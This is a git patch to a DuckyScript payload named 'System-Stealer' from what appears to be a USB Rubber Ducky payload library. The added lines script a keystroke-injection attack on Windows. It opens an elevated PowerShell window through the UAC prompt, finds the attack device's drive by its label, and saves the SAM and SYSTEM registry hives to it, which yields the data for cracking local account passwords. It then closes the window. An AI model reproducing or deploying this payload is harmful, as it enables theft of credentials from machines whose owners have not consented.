From 61eb88ab6c0b5e52ce7aafa6283483bce9fc8148 Mon Sep 17 00:00:00 2001
From: Mavis Coffey <129871621+mavisinator30001@users.noreply.github.com>
Date: Tue, 22 Oct 2024 14:41:32 -0400
Subject: [PATCH] Update payload.txt

---
 .../exfiltration/System-Stealer/payload.txt      | 16 ++++++++++------
 1 file changed, 10 insertions(+), 6 deletions(-)

diff --git a/payloads/library/exfiltration/System-Stealer/payload.txt b/payloads/library/exfiltration/System-Stealer/payload.txt
index 85d2db0..23fdd6c 100644
--- a/payloads/library/exfiltration/System-Stealer/payload.txt
+++ b/payloads/library/exfiltration/System-Stealer/payload.txt
@@ -47,24 +47,28 @@ EXTENSION PASSIVE_WINDOWS_DETECT
         END_IF
     END_REM
 END_EXTENSION
+REM Change $DRIVELABEL to the storage label of your duck
+DEFINE #DRIVELABEL DUCKY
 IF ($_OS == WINDOWS) THEN
-    INJECT_MOD GUI R
+    GUI r
     DELAY 500
-    STRING cmd
+    STRING powershell
     DELAY 1000
     CTRL-SHIFT-ENTER
     DELAY 750
     LEFT
     ENTER
     DELAY 1000
-    REM Change $DRIVELABEL to the storage label of your duck
-    DEFINE #DRIVELABEL D:
-    STRINGLN reg save HKLM\sam #DRIVELABEL/sam.save
+    STRINGLN $DriveLetter = (Get-WmiObject -Query "SELECT * FROM Win32_LogicalDisk WHERE VolumeName='#DRIVELABEL'").DeviceID; Set-Variable -Name 'DriveLetter' -Value $DriveLetter -Scope Global; Write-Output $DriveLetter
+    DELAY 250
+    STRINGLN reg save HKLM\sam $DriveLetter/sam.save
     WAIT_FOR_STORAGE_ACTIVITY
     WAIT_FOR_STORAGE_INACTIVITY
-    STRINGLN reg save HKLM\system #DRIVELABEL/system.save
+    STRINGLN reg save HKLM\system $DriveLetter/system.save
     WAIT_FOR_STORAGE_ACTIVITY
     WAIT_FOR_STORAGE_INACTIVITY
+    ALT F4
 ELSE
+    ATTACKMODE OFF
     STOP_PAYLOAD
 END_IF